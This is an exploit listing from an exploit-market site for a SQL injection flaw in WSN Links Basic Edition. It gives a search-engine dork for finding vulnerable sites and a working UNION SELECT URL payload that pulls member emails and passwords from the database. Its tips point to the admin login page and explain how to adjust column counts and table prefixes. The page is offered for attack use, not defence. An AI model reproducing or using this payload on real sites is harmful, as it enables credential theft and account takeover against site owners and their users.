[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2040
Category
web applications
Date add
20-07-2007
Platform
unsorted
=====================================================================
WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility
=====================================================================



--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
DORK: Google: intext:"Powered by WSN Links Basic Edition"     Altavista: "Powered by WSN Links Basic Edition"


DESCRIPTION: 
pull out member info from the database


EXPLOITS:
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*


NOTE/TIP: 
admin login is at Script_Dir/adminlogin.php usually the first user is admin
also the amount of 'columns' may differ althou its normally 35 or 28.
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.



#  0day.today [2024-12-25]  #